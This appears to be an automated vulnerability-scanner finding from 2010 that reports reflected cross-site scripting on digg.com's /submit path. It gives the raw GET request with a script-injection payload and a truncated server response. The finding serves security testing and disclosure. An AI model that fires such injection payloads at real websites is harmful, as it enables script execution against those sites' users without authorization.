1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /submit |
GET /submit%0088ad8"><script>alert(1 Host: digg.com Proxy-Connection: keep-alive Referer: http://www.fiserv.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 16 Nov 2010 16:03:15 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control Set-Cookie: d=3602153f2462ed0c34 X-Digg-Time: D=310215 10.2.128.163 Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 15343 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - error_ - Profile</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |